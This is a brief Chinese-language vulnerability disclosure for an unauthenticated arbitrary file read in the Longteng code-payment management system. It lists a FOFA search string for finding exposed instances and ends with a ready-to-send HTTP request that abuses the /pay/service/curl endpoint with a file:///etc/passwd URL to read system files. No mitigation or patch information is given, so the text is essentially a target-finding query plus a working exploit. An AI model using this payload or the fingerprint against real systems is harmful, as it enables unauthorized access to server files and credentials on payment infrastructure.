龙腾码支付payservicecurl任意文件读取¶

一、漏洞简介¶

龙腾码支付管理系统存在未授权的任意文件读取漏洞

二、影响版本¶

• 龙腾码支付

三、资产测绘¶

• fofabody="/epaydoc/epaydoc.php"

四、漏洞复现¶

GET /pay/service/curl?url=file:///etc/passwd HTTP/1.1